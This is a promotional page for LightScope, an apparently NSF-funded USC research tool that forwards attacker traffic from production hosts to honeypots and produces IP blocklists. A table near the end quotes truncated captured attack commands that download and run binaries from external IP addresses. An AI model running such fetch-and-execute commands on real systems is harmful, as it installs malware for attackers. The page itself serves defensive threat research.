Free, Open Source, Cybersecurity Research

IP Blocklists Work... Until They Don't.

Install LightScope And See What You're Missing.

The table below shows how IPs observed attacking LightScope endpoints can be misclassified by other services.

Attacker IP AbuseIPDB Score GreyNoise Status GreyNoise Class LightScope Blocklist Interactions

Why Should You Install LightScope?

Problem

IP reputation services and blocklists are conservative. They build consensus before blocking IPs, and due to spoofing concerns, they don't like to ban IPs they can't verify. This means some attacker IPs aren't correctly blocked.

Solution

Deploying LightScope on your network helps these services correctly categorize unwanted traffic, gives you detailed threat intelligence, and provides personalized blocklists for your network to augment the ones you already have.

Installing LightScope Will:

  • Support Research, The Open Source Community, And Make the Internet A Better Place
  • Give You Detailed Threat Intelligence About Who's Targeting You
  • Provide You With Personalized Blocklists To Augment The Ones You Already Have
  • Not Cost You Anything

[Image: General Dashboard View]

[Image: Individual Threat Actors View]

What is LightScope?

LightScope is a free, open source cybersecurity research initiative that examines unwanted traffic from attackers and scanners. LightScope differs from existing solutions in that it turns closed ports on live machines into network telescopes/honeypots and transparently forwards attacker traffic to USC-managed honeypots. This removes the risk of running honeypots on production systems and makes LightScope difficult for attackers to detect and avoid (unlike traditional honeypots and network telescopes). All this leads to better data for researchers and network operators.

The LightScope client is free, open source, extremely lightweight, and designed to run on production machines. If you install it you will be provided with rich information about who's targeting your network and tailored IP blocklists you can use to keep your network safe.

LightScope is based upon work supported by the U.S. National Science Foundation under Grant No. 2313998 and the University of Southern California Information Sciences Institute.

Your IP BlockList Is Too Forgiving.

Support NSF Cybersecurity Research at the University of Southern California, and the Open Source Community!

See who's targeting your systems • Get custom IP blocklists • Help us make the internet safer.

IRB Certified Data Protection
LightScope has passed IRB approval from the University of Southern California Institutional Review Board, verifying our anonymization, collection, and encrypted storage methods (certified exempt), as study UP-25-00124: "LightScope - Survey of unwanted traffic to large user populations".

How LightScope Compares

See how LightScope's unique approach provides advantages over other security tools and services.

VS

GreyNoise

LightScope runs on production hosts instead of dedicated honeypots, providing a different vantage point.

VS

AbuseIPDB & SpamHaus

LightScope blocks IPs faster. We report our findings to these services, but it may take more than our reports to get an IP blocked.

VS

Cisco Talos

LightScope is free, open source, and vendor-neutral - not limited to any one vendor's ecosystem.

VS

Fail2Ban

LightScope analyzes traffic at a lower level with more visibility, detecting things like port scans that Fail2Ban doesn't analyze.

VS

CrowdStrike Falcon

LightScope won't brick your system, as it doesn't need to run as root/admin. It's free, open source, and ultra-lightweight.

VS

SentinelOne Singularity

LightScope won't slow down your system as it doesn't scan running processes or system memory.

VS

EDR/XDR

LightScope is not EDR/XDR. LightScope gathers information about attackers and produces IP blocklists. Unlike EDR/XDR, it is extremely fast and won't bog down your system inspecting processes or memory. It is designed to work with your existing EDR/XDR solutions.

VS

Honeypots

LightScope runs on production systems, which attackers target. Attackers avoid dedicated honeypots, but to attackers LightScope systems appear real (because they are). LightScope is more secure than running your own honeypot, as it transparently forwards attackers to USC-managed honeypots.

VS

Network Telescopes

Attackers avoid darkspace hosting network telescopes. LightScope works with your in-use IP addresses and live machines. Feel free to use both and get complete network coverage!

Top Observed Attacks

Real attack commands captured by LightScope honeypots running on production systems

Attack Type | Attacker IP | Command Preview
Malware Download & Execute Campaign | 196.251.71.119 | nohup $SHELL -c "curl http://47.236.20.49:60120/linux -o /tmp/haBCRfTf6Z...
Encrypted Payload Deployment | 159.89.105.244 | nohup $SHELL -c "curl http://8.220.245.115:60117/linux -o /tmp/Xqmvb45Dzl...
Multi-Stage Botnet Infection | 204.48.23.8 | nohup $SHELL -c "curl http://47.239.192.107:60140/linux -o /tmp/QNl0GdStgG...

Acknowledgments

IPinfo.io

We gratefully acknowledge IPinfo.io for their generous support of academic research by providing free access to their comprehensive IP geolocation and intelligence data.

AbuseIPDB

We thank AbuseIPDB for their partnership and support of LightScope. Their comprehensive IP reputation database and commitment to cybersecurity research helps make the internet safer for everyone.

GreyNoise.io

We gratefully acknowledge GreyNoise.io for their generous support of academic research by providing free access to their comprehensive intelligence data.


This material is based upon work supported by the U.S. National Science Foundation under Grant No. 2313998. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the U.S. National Science Foundation.

University of Southern California

Information Sciences Institute & Viterbi School of Engineering